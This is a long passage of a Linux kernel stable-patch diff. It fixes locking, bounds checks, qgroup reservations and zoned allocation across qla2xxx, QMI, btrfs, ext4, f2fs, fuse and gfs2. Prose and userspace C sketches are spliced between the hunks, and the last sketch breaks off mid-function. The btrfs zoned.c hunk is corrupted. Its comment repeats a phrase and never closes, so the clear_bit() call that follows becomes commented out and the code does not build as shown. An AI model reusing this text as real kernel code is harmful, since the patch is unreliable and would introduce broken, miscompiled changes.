+@@ -3278,6 +3281,13 @@ qla2x00_probe_one(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	host->max_id = ha->max_fibre_devices;
+ 	host->cmd_per_lun = 3;
+ 	host->unique_id = host->host_no;
++
++	if (ql2xenabledif && ql2xenabledif != 2) {
++		ql_log(ql_log_warn, base_vha, 0x302d,
++		       "Invalid value for ql2xenabledif, resetting it to default (2)\n");
++		ql2xenabledif = 2;
++	}
++
+ 	if (IS_T10_PI_CAPABLE(ha) && ql2xenabledif)
+ 		host->max_cmd_len = 32;
+ 	else
+@@ -3515,8 +3525,6 @@ skip_dpc:
+ 			base_vha->flags.difdix_supported = 1;
+ 			ql_dbg(ql_dbg_init, base_vha, 0x00f1,
+ 			    "Registering for DIF/DIX type 1 and 3 protection.\n");
+-			if (ql2xenabledif == 1)
+-				prot = SHOST_DIX_TYPE0_PROTECTION;
+ 			if (ql2xprotmask)
+ 				scsi_host_set_prot(host, ql2xprotmask);
+ 			else
+diff --git a/drivers/scsi/qla2xxx/qla_target.c b/drivers/scsi/qla2xxx/qla_target.c
+index bb754a9508023..545473a0ffc84 100644
+--- a/drivers/scsi/qla2xxx/qla_target.c
++++ b/drivers/scsi/qla2xxx/qla_target.c
+@@ -1085,10 +1085,6 @@ void qlt_free_session_done(struct work_struct *work)
+ 			(struct imm_ntfy_from_isp *)sess->iocb, SRB_NACK_LOGO);
+ 	}
+ 
+-	spin_lock_irqsave(&vha->work_lock, flags);
+-	sess->flags &= ~FCF_ASYNC_SENT;
+-	spin_unlock_irqrestore(&vha->work_lock, flags);
+-
+ 	spin_lock_irqsave(&ha->tgt.sess_lock, flags);
+ 	if (sess->se_sess) {
+ 		sess->se_sess = NULL;
+@@ -1098,7 +1094,6 @@ void qlt_free_session_done(struct work_struct *work)
+ 
+ 	qla2x00_set_fcport_disc_state(sess, DSC_DELETED);
+ 	sess->fw_login_state = DSC_LS_PORT_UNAVAIL;
+-	sess->deleted = QLA_SESS_DELETED;
+ 
+ 	if (sess->login_succ && !IS_SW_RESV_ADDR(sess->d_id)) {
+ 		vha->fcport_count--;
+@@ -1150,10 +1145,15 @@ void qlt_free_session_done(struct work_struct *work)
+ 
+ 	sess->explicit_logout = 0;
+ 	spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
+-	sess->free_pending = 0;
+ 
+ 	qla2x00_dfs_remove_rport(vha, sess);
+ 
++	spin_lock_irqsave(&vha->work_lock, flags);
++	sess->flags &= ~FCF_ASYNC_SENT;
++	sess->deleted = QLA_SESS_DELETED;
++	sess->free_pending = 0;
++	spin_unlock_irqrestore(&vha->work_lock, flags);
++
+ 	ql_dbg(ql_dbg_disc, vha, 0xf001,
+ 	    "Unregistration of sess %p %8phC finished fcp_cnt %d\n",
+ 		sess, sess->port_name, vha->fcport_count);
+@@ -1202,12 +1202,12 @@ void qlt_unreg_sess(struct fc_port *sess)
+ 	 * management from being sent.
+ 	 */
+ 	sess->flags |= FCF_ASYNC_SENT;
++	sess->deleted = QLA_SESS_DELETION_IN_PROGRESS;
+ 	spin_unlock_irqrestore(&sess->vha->work_lock, flags);
+ 
+ 	if (sess->se_sess)
+ 		vha->hw->tgt.tgt_ops->clear_nacl_from_fcport_map(sess);
+ 
+-	sess->deleted = QLA_SESS_DELETION_IN_PROGRESS;
+ 	qla2x00_set_fcport_disc_state(sess, DSC_DELETE_PEND);
+ 	sess->last_rscn_gen = sess->rscn_gen;
+ 	sess->last_login_gen = sess->login_gen;
+diff --git a/drivers/soc/qcom/qmi_encdec.c b/drivers/soc/qcom/qmi_encdec.c
+index b7158e3c3a0bd..5c7161b18b724 100644
+--- a/drivers/soc/qcom/qmi_encdec.c
++++ b/drivers/soc/qcom/qmi_encdec.c
+@@ -534,8 +534,8 @@ static int qmi_decode_string_elem(const struct qmi_elem_info *ei_array,
+ 		decoded_bytes += rc;
+ 	}
+ 
+-	if (string_len > temp_ei->elem_len) {
+-		pr_err("%s: String len %d > Max Len %d\n",
++	if (string_len >= temp_ei->elem_len) {
++		pr_err("%s: String len %d >= Max Len %d\n",
+ 		       __func__, string_len, temp_ei->elem_len);
+ 		return -ETOOSMALL;
+ 	} else if (string_len > tlv_len) {
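
The qmi_encdec fix above rejects string_len == elem_len as well as string_len > elem_len: the decoder NUL-terminates the decoded string into a buffer of elem_len bytes, so a payload of exactly elem_len characters leaves no room for the terminator. A minimal userspace sketch of the same rule, with illustrative names (decode_string is not the kernel API):

#include <stdio.h>
#include <string.h>

/* Copy a length-prefixed payload into buf and NUL-terminate it.
 * Rejecting len >= buf_len (not just len > buf_len) keeps one byte
 * free for the terminator.
 */
static int decode_string(char *buf, size_t buf_len,
			 const char *payload, size_t len)
{
	if (len >= buf_len)	/* '>' alone would overflow by one byte */
		return -1;
	memcpy(buf, payload, len);
	buf[len] = '\0';
	return 0;
}

int main(void)
{
	char buf[8];

	printf("%d\n", decode_string(buf, sizeof(buf), "1234567", 7));  /* 0: fits */
	printf("%d\n", decode_string(buf, sizeof(buf), "12345678", 8)); /* -1: no room for NUL */
	return 0;
}
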
+diff --git a/drivers/video/backlight/gpio_backlight.c b/drivers/video/backlight/gpio_backlight.c
+index 5c5c99f7979e3..30ec5b6845335 100644
+--- a/drivers/video/backlight/gpio_backlight.c
++++ b/drivers/video/backlight/gpio_backlight.c
+@@ -87,8 +87,7 @@ static int gpio_backlight_probe(struct platform_device *pdev)
+ 		/* Not booted with device tree or no phandle link to the node */
+ 		bl->props.power = def_value ? FB_BLANK_UNBLANK
+ 					    : FB_BLANK_POWERDOWN;
+-	else if (gpiod_get_direction(gbl->gpiod) == 0 &&
+-		 gpiod_get_value_cansleep(gbl->gpiod) == 0)
++	else if (gpiod_get_value_cansleep(gbl->gpiod) == 0)
+ 		bl->props.power = FB_BLANK_POWERDOWN;
+ 	else
+ 		bl->props.power = FB_BLANK_UNBLANK;
+diff --git a/drivers/video/fbdev/ep93xx-fb.c b/drivers/video/fbdev/ep93xx-fb.c
+index 305f1587bd898..8b2bc4adc50f7 100644
+--- a/drivers/video/fbdev/ep93xx-fb.c
++++ b/drivers/video/fbdev/ep93xx-fb.c
+@@ -474,7 +474,6 @@ static int ep93xxfb_probe(struct platform_device *pdev)
+ 	if (!info)
+ 		return -ENOMEM;
+ 
+-	info->dev = &pdev->dev;
+ 	platform_set_drvdata(pdev, info);
+ 	fbi = info->par;
+ 	fbi->mach_info = mach_info;
+diff --git a/drivers/watchdog/intel-mid_wdt.c b/drivers/watchdog/intel-mid_wdt.c
+index 9b2173f765c8c..fb7fae750181b 100644
+--- a/drivers/watchdog/intel-mid_wdt.c
++++ b/drivers/watchdog/intel-mid_wdt.c
+@@ -203,3 +203,4 @@ module_platform_driver(mid_wdt_driver);
+ MODULE_AUTHOR("David Cohen <david.a.cohen@linux.intel.com>");
+ MODULE_DESCRIPTION("Watchdog Driver for Intel MID platform");
+ MODULE_LICENSE("GPL");
++MODULE_ALIAS("platform:intel_mid_wdt");
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 96369c44863a1..64daae693afd1 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -2721,11 +2721,10 @@ int btrfs_validate_super(struct btrfs_fs_info *fs_info,
+ 		ret = -EINVAL;
+ 	}
+ 
+-	if (memcmp(fs_info->fs_devices->fsid, fs_info->super_copy->fsid,
+-		   BTRFS_FSID_SIZE)) {
++	if (memcmp(fs_info->fs_devices->fsid, sb->fsid, BTRFS_FSID_SIZE) != 0) {
+ 		btrfs_err(fs_info,
+ 		"superblock fsid doesn't match fsid of fs_devices: %pU != %pU",
+-			fs_info->super_copy->fsid, fs_info->fs_devices->fsid);
++			  sb->fsid, fs_info->fs_devices->fsid);
+ 		ret = -EINVAL;
+ 	}
+ 
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index f2ee70c03f0d5..0640ef59fe660 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -3810,7 +3810,8 @@ static int do_allocation_zoned(struct btrfs_block_group *block_group,
+ 	       fs_info->data_reloc_bg == 0);
+ 
+ 	if (block_group->ro ||
+-	    test_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags)) {
++	    (!ffe_ctl->for_data_reloc &&
++	     test_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags))) {
+ 		ret = 1;
+ 		goto out;
+ 	}
+@@ -3853,8 +3854,26 @@ static int do_allocation_zoned(struct btrfs_block_group *block_group,
+ 	if (ffe_ctl->for_treelog && !fs_info->treelog_bg)
+ 		fs_info->treelog_bg = block_group->start;
+ 
+-	if (ffe_ctl->for_data_reloc && !fs_info->data_reloc_bg)
+-		fs_info->data_reloc_bg = block_group->start;
++	if (ffe_ctl->for_data_reloc) {
++		if (!fs_info->data_reloc_bg)
++			fs_info->data_reloc_bg = block_group->start;
++		/*
++		 * Do not allow allocations from this block group, unless it is
++		 * for data relocation. Compared to increasing the ->ro, setting
++		 * the ->zoned_data_reloc_ongoing flag still allows nocow
++		 * writers to come in. See btrfs_inc_nocow_writers().
++		 *
++		 * We need to disable allocations here to avoid allocating a
++		 * regular (non-relocation data) extent. With a mix of relocation
++		 * extents and regular extents, we can dispatch WRITE commands
++		 * (for relocation extents) and ZONE APPEND commands (for
++		 * regular extents) at the same time to the same zone, which
++		 * easily breaks the write pointer.
++		 *
++		 * Also, this flag prevents this block group from being zone finished.
++		 */
++		set_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags);
++	}
+ 
+ 	ffe_ctl->found_offset = start + block_group->alloc_offset;
+ 	block_group->alloc_offset += num_bytes;
+@@ -3872,24 +3891,8 @@ static int do_allocation_zoned(struct btrfs_block_group *block_group,
+ out:
+ 	if (ret && ffe_ctl->for_treelog)
+ 		fs_info->treelog_bg = 0;
+-	if (ret && ffe_ctl->for_data_reloc &&
+-	    fs_info->data_reloc_bg == block_group->start) {
+-		/*
+-		 * Do not allow further allocations from this block group.
+-		 * Compared to increasing the ->ro, setting the
+-		 * ->zoned_data_reloc_ongoing flag still allows nocow
+-		 *  writers to come in. See btrfs_inc_nocow_writers().
+-		 *
+-		 * We need to disable an allocation to avoid an allocation of
+-		 * regular (non-relocation data) extent. With mix of relocation
+-		 * extents and regular extents, we can dispatch WRITE commands
+-		 * (for relocation extents) and ZONE APPEND commands (for
+-		 * regular extents) at the same time to the same zone, which
+-		 * easily break the write pointer.
+-		 */
+-		set_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags);
++	if (ret && ffe_ctl->for_data_reloc)
+ 		fs_info->data_reloc_bg = 0;
+-	}
+ 	spin_unlock(&fs_info->relocation_bg_lock);
+ 	spin_unlock(&fs_info->treelog_bg_lock);
+ 	spin_unlock(&block_group->lock);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 28bcba2e05908..222068bf80031 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -3393,6 +3393,13 @@ out:
+ 			btrfs_free_reserved_extent(fs_info,
+ 					ordered_extent->disk_bytenr,
+ 					ordered_extent->disk_num_bytes, 1);
++			/*
++			 * Actually free the qgroup rsv which was released when
++			 * the ordered extent was created.
++			 */
++			btrfs_qgroup_free_refroot(fs_info, inode->root->root_key.objectid,
++						  ordered_extent->qgroup_rsv,
++						  BTRFS_QGROUP_RSV_DATA);
+ 		}
+ 	}
+ 
+diff --git a/fs/btrfs/relocation.c b/fs/btrfs/relocation.c
+index d3591c7f166ad..d2bdcc2cce498 100644
+--- a/fs/btrfs/relocation.c
++++ b/fs/btrfs/relocation.c
+@@ -2985,9 +2985,6 @@ static int relocate_one_page(struct inode *inode, struct file_ra_state *ra,
+ 		if (!page)
+ 			return -ENOMEM;
+ 	}
+-	ret = set_page_extent_mapped(page);
+-	if (ret < 0)
+-		goto release_page;
+ 
+ 	if (PageReadahead(page))
+ 		page_cache_async_readahead(inode->i_mapping, ra, NULL,
+@@ -3003,6 +3000,15 @@ static int relocate_one_page(struct inode *inode, struct file_ra_state *ra,
+ 		}
+ 	}
+ 
++	/*
++	 * We could have lost page private when we dropped the lock to read the
++	 * page above, so make sure we call set_page_extent_mapped() here to
++	 * have the subpage blocksize state we need in place.
++	 */
++	ret = set_page_extent_mapped(page);
++	if (ret < 0)
++		goto release_page;
++
+ 	page_start = page_offset(page);
+ 	page_end = page_start + PAGE_SIZE - 1;
+ 
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index c7642c00a65d0..2635fb4bffa06 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -404,11 +404,7 @@ int btrfs_can_overcommit(struct btrfs_fs_info *fs_info,
+ 		return 0;
+ 
+ 	used = btrfs_space_info_used(space_info, true);
+-	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &fs_info->flags) &&
+-	    (space_info->flags & BTRFS_BLOCK_GROUP_METADATA))
+-		avail = 0;
+-	else
+-		avail = calc_available_free_space(fs_info, space_info, flush);
++	avail = calc_available_free_space(fs_info, space_info, flush);
+ 
+ 	if (used + bytes < writable_total_bytes(fs_info, space_info) + avail)
+ 		return 1;
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 2b776fce1c0ff..a555567594418 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -279,10 +279,11 @@ loop:
+ 	spin_unlock(&fs_info->trans_lock);
+ 
+ 	/*
+-	 * If we are ATTACH, we just want to catch the current transaction,
+-	 * and commit it. If there is no transaction, just return ENOENT.
++	 * If we are ATTACH or TRANS_JOIN_NOSTART, we just want to catch the
++	 * current transaction, and commit it. If there is no transaction, just
++	 * return ENOENT.
+ 	 */
+-	if (type == TRANS_ATTACH)
++	if (type == TRANS_ATTACH || type == TRANS_JOIN_NOSTART)
+ 		return -ENOENT;
+ 
+ 	/*
+@@ -580,8 +581,13 @@ start_transaction(struct btrfs_root *root, unsigned int num_items,
+ 		u64 delayed_refs_bytes = 0;
+ 
+ 		qgroup_reserved = num_items * fs_info->nodesize;
+-		ret = btrfs_qgroup_reserve_meta_pertrans(root, qgroup_reserved,
+-				enforce_qgroups);
++		/*
++		 * Use prealloc for now, as there might be a currently running
++		 * transaction that could free this reserved space prematurely
++		 * by committing.
++		 */
++		ret = btrfs_qgroup_reserve_meta_prealloc(root, qgroup_reserved,
++							 enforce_qgroups, false);
+ 		if (ret)
+ 			return ERR_PTR(ret);
+ 
+@@ -693,6 +699,14 @@ again:
+ 		h->reloc_reserved = reloc_reserved;
+ 	}
+ 
++	/*
++	 * Now that we have found a transaction to be a part of, convert the
++	 * qgroup reservation from prealloc to pertrans. A different transaction
++	 * can't race in and free our pertrans out from under us.
++	 */
++	if (qgroup_reserved)
++		btrfs_qgroup_convert_reserved_meta(root, qgroup_reserved);
++
+ got_it:
+ 	if (!current->journal_info)
+ 		current->journal_info = h;
+@@ -740,7 +754,7 @@ alloc_fail:
+ 		btrfs_block_rsv_release(fs_info, &fs_info->trans_block_rsv,
+ 					num_bytes, NULL);
+ reserve_fail:
+-	btrfs_qgroup_free_meta_pertrans(root, qgroup_reserved);
++	btrfs_qgroup_free_meta_prealloc(root, qgroup_reserved);
+ 	return ERR_PTR(ret);
+ }
+ 
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 9bc7ac06c5177..675dbed075d8e 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -2009,6 +2009,10 @@ static int do_zone_finish(struct btrfs_block_group *block_group, bool fully_writ
+ 	 * and block_group->meta_write_pointer for metadata.
+ 	 */
+ 	if (!fully_written) {
++		if (test_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags)) {
++			spin_unlock(&block_group->lock);
++			return -EAGAIN;
++		}
+ 		spin_unlock(&block_group->lock);
+ 
+ 		ret = btrfs_inc_block_group_ro(block_group, false);
+@@ -2037,7 +2041,9 @@ static int do_zone_finish(struct btrfs_block_group *block_group, bool fully_writ
+ 			return 0;
+ 		}
+ 
+-		if (block_group->reserved) {
++		if (block_group->reserved ||
++		    test_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC,
++			     &block_group->runtime_flags)) {
+ 			spin_unlock(&block_group->lock);
+ 			btrfs_dec_block_group_ro(block_group);
+ 			return -EAGAIN;
+@@ -2268,7 +2274,10 @@ void btrfs_zoned_release_data_reloc_bg(struct btrfs_fs_info *fs_info, u64 logica
+ 
+ 	/* All relocation extents are written. */
+ 	if (block_group->start + block_group->alloc_offset == logical + length) {
+-		/* Now, release this block group for further allocations. */
++		/*
++		 * Now, release this block group for further allocations and
++		 * zone finish.
++		 * zone finishing.
+ 		clear_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC,
+ 			  &block_group->runtime_flags);
+ 	}
+@@ -2292,7 +2301,8 @@ int btrfs_zone_finish_one_bg(struct btrfs_fs_info *fs_info)
+ 
+ 		spin_lock(&block_group->lock);
+ 		if (block_group->reserved || block_group->alloc_offset == 0 ||
+-		    (block_group->flags & BTRFS_BLOCK_GROUP_SYSTEM)) {
++		    (block_group->flags & BTRFS_BLOCK_GROUP_SYSTEM) ||
++		    test_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags)) {
+ 			spin_unlock(&block_group->lock);
+ 			continue;
+ 		}
+diff --git a/fs/ext4/balloc.c b/fs/ext4/balloc.c
+index 8e83b51e3c68a..fbd0329cf254e 100644
+--- a/fs/ext4/balloc.c
++++ b/fs/ext4/balloc.c
+@@ -910,11 +910,11 @@ unsigned long ext4_bg_num_gdb(struct super_block *sb, ext4_group_t group)
+ }
+ 
+ /*
+- * This function returns the number of file system metadata clusters at
++ * This function returns the number of file system metadata blocks at
+  * the beginning of a block group, including the reserved gdt blocks.
+  */
+-static unsigned ext4_num_base_meta_clusters(struct super_block *sb,
+-				     ext4_group_t block_group)
++unsigned int ext4_num_base_meta_blocks(struct super_block *sb,
++				       ext4_group_t block_group)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	unsigned num;
+@@ -932,8 +932,15 @@ static unsigned ext4_num_base_meta_clusters(struct super_block *sb,
+ 	} else { /* For META_BG_BLOCK_GROUPS */
+ 		num += ext4_bg_num_gdb(sb, block_group);
+ 	}
+-	return EXT4_NUM_B2C(sbi, num);
++	return num;
+ }
++
++static unsigned int ext4_num_base_meta_clusters(struct super_block *sb,
++						ext4_group_t block_group)
++{
++	return EXT4_NUM_B2C(EXT4_SB(sb), ext4_num_base_meta_blocks(sb, block_group));
++}
++
+ /**
+  *	ext4_inode_to_goal_block - return a hint for block allocation
+  *	@inode: inode for block allocation
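
The balloc.c refactor above splits the old cluster-count helper into a raw block count (ext4_num_base_meta_blocks) plus a conversion through EXT4_NUM_B2C, so block_validity.c can work with exact block numbers. The conversion is round-up division by the cluster ratio; a standalone sketch (cluster_bits is illustrative here, the kernel reads it from the superblock):

#include <stdio.h>

/* Round a block count up to whole clusters, as EXT4_NUM_B2C does.
 * A bigalloc cluster is 2^cluster_bits blocks; values below are
 * illustrative, not taken from a real filesystem.
 */
static unsigned int blocks_to_clusters(unsigned int blocks,
				       unsigned int cluster_bits)
{
	unsigned int ratio = 1U << cluster_bits;

	return (blocks + ratio - 1) >> cluster_bits;
}

int main(void)
{
	/* 17 metadata blocks with 16-block clusters occupy 2 clusters */
	printf("%u\n", blocks_to_clusters(17, 4)); /* 2 */
	/* with 1-block clusters (no bigalloc) the counts are identical */
	printf("%u\n", blocks_to_clusters(17, 0)); /* 17 */
	return 0;
}
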
+diff --git a/fs/ext4/block_validity.c b/fs/ext4/block_validity.c
+index 5504f72bbbbe7..6fe3c941b5651 100644
+--- a/fs/ext4/block_validity.c
++++ b/fs/ext4/block_validity.c
+@@ -215,7 +215,6 @@ int ext4_setup_system_zone(struct super_block *sb)
+ 	struct ext4_system_blocks *system_blks;
+ 	struct ext4_group_desc *gdp;
+ 	ext4_group_t i;
+-	int flex_size = ext4_flex_bg_size(sbi);
+ 	int ret;
+ 
+ 	system_blks = kzalloc(sizeof(*system_blks), GFP_KERNEL);
+@@ -223,12 +222,13 @@ int ext4_setup_system_zone(struct super_block *sb)
+ 		return -ENOMEM;
+ 
+ 	for (i=0; i < ngroups; i++) {
++		unsigned int meta_blks = ext4_num_base_meta_blocks(sb, i);
++
+ 		cond_resched();
+-		if (ext4_bg_has_super(sb, i) &&
+-		    ((i < 5) || ((i % flex_size) == 0))) {
++		if (meta_blks != 0) {
+ 			ret = add_system_zone(system_blks,
+ 					ext4_group_first_block_no(sb, i),
+-					ext4_bg_num_gdb(sb, i) + 1, 0);
++					meta_blks, 0);
+ 			if (ret)
+ 				goto err;
+ 		}
+diff --git a/fs/ext4/crypto.c b/fs/ext4/crypto.c
+index e20ac0654b3f2..453d4da5de520 100644
+--- a/fs/ext4/crypto.c
++++ b/fs/ext4/crypto.c
+@@ -33,6 +33,8 @@ int ext4_fname_setup_filename(struct inode *dir, const struct qstr *iname,
+ 
+ #if IS_ENABLED(CONFIG_UNICODE)
+ 	err = ext4_fname_setup_ci_filename(dir, iname, fname);
++	if (err)
++		ext4_fname_free_filename(fname);
+ #endif
+ 	return err;
+ }
+@@ -51,6 +53,8 @@ int ext4_fname_prepare_lookup(struct inode *dir, struct dentry *dentry,
+ 
+ #if IS_ENABLED(CONFIG_UNICODE)
+ 	err = ext4_fname_setup_ci_filename(dir, &dentry->d_name, fname);
++	if (err)
++		ext4_fname_free_filename(fname);
+ #endif
+ 	return err;
+ }
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 0ea3960cb83ee..72abb8d6caf75 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -3096,6 +3096,8 @@ extern const char *ext4_decode_error(struct super_block *sb, int errno,
+ extern void ext4_mark_group_bitmap_corrupted(struct super_block *sb,
+ 					     ext4_group_t block_group,
+ 					     unsigned int flags);
++extern unsigned int ext4_num_base_meta_blocks(struct super_block *sb,
++					      ext4_group_t block_group);
+ 
+ extern __printf(7, 8)
+ void __ext4_error(struct super_block *, const char *, unsigned int, bool,
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index c2b7d09238941..37dca728ff967 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -2160,15 +2160,6 @@ static inline int f2fs_down_read_trylock(struct f2fs_rwsem *sem)
+ 	return down_read_trylock(&sem->internal_rwsem);
+ }
+ 
+-#ifdef CONFIG_DEBUG_LOCK_ALLOC
+-static inline void f2fs_down_read_nested(struct f2fs_rwsem *sem, int subclass)
+-{
+-	down_read_nested(&sem->internal_rwsem, subclass);
+-}
+-#else
+-#define f2fs_down_read_nested(sem, subclass) f2fs_down_read(sem)
+-#endif
+-
+ static inline void f2fs_up_read(struct f2fs_rwsem *sem)
+ {
+ 	up_read(&sem->internal_rwsem);
+@@ -2179,6 +2170,21 @@ static inline void f2fs_down_write(struct f2fs_rwsem *sem)
+ 	down_write(&sem->internal_rwsem);
+ }
+ 
++#ifdef CONFIG_DEBUG_LOCK_ALLOC
++static inline void f2fs_down_read_nested(struct f2fs_rwsem *sem, int subclass)
++{
++	down_read_nested(&sem->internal_rwsem, subclass);
++}
++
++static inline void f2fs_down_write_nested(struct f2fs_rwsem *sem, int subclass)
++{
++	down_write_nested(&sem->internal_rwsem, subclass);
++}
++#else
++#define f2fs_down_read_nested(sem, subclass) f2fs_down_read(sem)
++#define f2fs_down_write_nested(sem, subclass) f2fs_down_write(sem)
++#endif
++
+ static inline int f2fs_down_write_trylock(struct f2fs_rwsem *sem)
+ {
+ 	return down_write_trylock(&sem->internal_rwsem);
+diff --git a/fs/f2fs/inline.c b/fs/f2fs/inline.c
+index 7e867dff681dc..8747eec3d0a34 100644
+--- a/fs/f2fs/inline.c
++++ b/fs/f2fs/inline.c
+@@ -642,7 +642,8 @@ int f2fs_add_inline_entry(struct inode *dir, const struct f2fs_filename *fname,
+ 	}
+ 
+ 	if (inode) {
+-		f2fs_down_write(&F2FS_I(inode)->i_sem);
++		f2fs_down_write_nested(&F2FS_I(inode)->i_sem,
++						SINGLE_DEPTH_NESTING);
+ 		page = f2fs_init_inode_metadata(inode, dir, fname, ipage);
+ 		if (IS_ERR(page)) {
+ 			err = PTR_ERR(page);
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index cbbf95b995414..16bf9d5c8d4f9 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -204,6 +204,8 @@ void f2fs_abort_atomic_write(struct inode *inode, bool clean)
+ 		f2fs_i_size_write(inode, fi->original_i_size);
+ 		fi->original_i_size = 0;
+ 	}
++	/* avoid stale dirty inode during eviction */
++	sync_inode_metadata(inode, 0);
+ }
+ 
+ static int __replace_atomic_write_block(struct inode *inode, pgoff_t index,
+diff --git a/fs/fuse/readdir.c b/fs/fuse/readdir.c
+index e8deaacf1832a..f40bc51fa5316 100644
+--- a/fs/fuse/readdir.c
++++ b/fs/fuse/readdir.c
+@@ -243,8 +243,16 @@ retry:
+ 			dput(dentry);
+ 			dentry = alias;
+ 		}
+-		if (IS_ERR(dentry))
++		if (IS_ERR(dentry)) {
++			if (!IS_ERR(inode)) {
++				struct fuse_inode *fi = get_fuse_inode(inode);
++
++				spin_lock(&fi->lock);
++				fi->nlookup--;
++				spin_unlock(&fi->lock);
++			}
+ 			return PTR_ERR(dentry);
++		}
+ 	}
+ 	if (fc->readdirplus_auto)
+ 		set_bit(FUSE_I_INIT_RDPLUS, &get_fuse_inode(inode)->state);
+diff --git a/fs/gfs2/aops.c b/fs/gfs2/aops.c
+index 2f04c0ff7470b..1e9fa26f04fe1 100644
+--- a/fs/gfs2/aops.c
++++ b/fs/gfs2/aops.c
+@@ -182,13 +182,13 @@ static int gfs2_writepages(struct address_space *mapping,
+ 	int ret;
+ 
+ 	/*
+-	 * Even if we didn't write any pages here, we might still be holding
++	 * Even if we didn't write enough pages here, we might still be holding
+ 	 * dirty pages in the ail. We forcibly flush the ail because we don't
+ 	 * want balance_dirty_pages() to loop indefinitely trying to write out
+ 	 * pages held in the ail that it can't find.
+ 	 */
+ 	ret = iomap_writepages(mapping, wbc, &wpc, &gfs2_writeback_ops);
+-	if (ret == 0)
++	if (ret == 0 && wbc->nr_to_write > 0)
+ 		set_bit(SDF_FORCE_AIL_FLUSH, &sdp->sd_flags);
+ 	return ret;
+ }
+diff --git a/fs/gfs2/log.c b/fs/gfs2/log.c
+index 61323deb80bc7..e021d5f50c231 100644
+--- a/fs/gfs2/log.c
++++ b/fs/gfs2/log.c
+@@ -1285,9 +1285,6 @@ static inline int gfs2_ail_flush_reqd(struct gfs2_sbd *sdp)
+ {
+ 	unsigned int used_blocks = sdp->sd_jdesc->jd_blocks - atomic_read(&sdp->sd_log_blks_free);
+ 
+-	if (test_and_clear_bit(SDF_FORCE_AIL_FLUSH, &sdp->sd_flags))
+-		return 1;
+-
+ 	return used_blocks + atomic_read(&sdp->sd_log_blks_needed) >=
+ 		atomic_read(&sdp->sd_log_thresh2);
+ }
+@@ -1304,7 +1301,6 @@ int gfs2_logd(void *data)
+ {
+ 	struct gfs2_sbd *sdp = data;
+ 	unsigned long t = 1;
+-	DEFINE_WAIT(wait);
+ 
+ 	while (!kthread_should_stop()) {
+ 
+@@ -1329,7 +1325,9 @@ int gfs2_logd(void *data)
+ 						  GFS2_LFC_LOGD_JFLUSH_REQD);
+ 		}
+ 
+-		if (gfs2_ail_flush_reqd(sdp)) {
++		if (test_bit(SDF_FORCE_AIL_FLUSH, &sdp->sd_flags) ||
++		    gfs2_ail_flush_reqd(sdp)) {
++			clear_bit(SDF_FORCE_AIL_FLUSH, &sdp->sd_flags);
+ 			gfs2_ail1_start(sdp);
+ 			gfs2_ail1_wait(sdp);
+ 			gfs2_ail1_empty(sdp, 0);
+@@ -1341,17 +1339,12 @@ int gfs2_logd(void *data)
+ 
+ 		try_to_freeze();
+ 
+-		do {
+-			prepare_to_wait(&sdp->sd_logd_waitq, &wait,
+-					TASK_INTERRUPTIBLE);
+-			if (!gfs2_ail_flush_reqd(sdp) &&
+-			    !gfs2_jrnl_flush_reqd(sdp) &&
+-			    !kthread_should_stop())
+-				t = schedule_timeout(t);
+-		} while(t && !gfs2_ail_flush_reqd(sdp) &&
+-			!gfs2_jrnl_flush_reqd(sdp) &&
+-			!kthread_should_stop());
+-		finish_wait(&sdp->sd_logd_waitq, &wait);
++		t = wait_event_interruptible_timeout(sdp->sd_logd_waitq,
++				test_bit(SDF_FORCE_AIL_FLUSH, &sdp->sd_flags) ||
++				gfs2_ail_flush_reqd(sdp) ||
++				gfs2_jrnl_flush_reqd(sdp) ||
++				kthread_should_stop(),
++				t);
+ 	}
+ 
+ 	return 0;
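
The gfs2_logd() rework above replaces an open-coded prepare_to_wait()/schedule_timeout() loop with wait_event_interruptible_timeout() over one composite predicate. The shape of that helper, sketched with POSIX condition variables (all names illustrative; compile with -pthread):

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>
#include <time.h>

/* Sleep until a predicate holds or a timeout expires, re-testing the
 * predicate after every wakeup — the bookkeeping the kernel helper
 * does internally.
 */
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
static bool flush_requested;

static bool wait_for_flush(int timeout_sec)
{
	struct timespec deadline;
	bool ok = true;

	clock_gettime(CLOCK_REALTIME, &deadline);
	deadline.tv_sec += timeout_sec;
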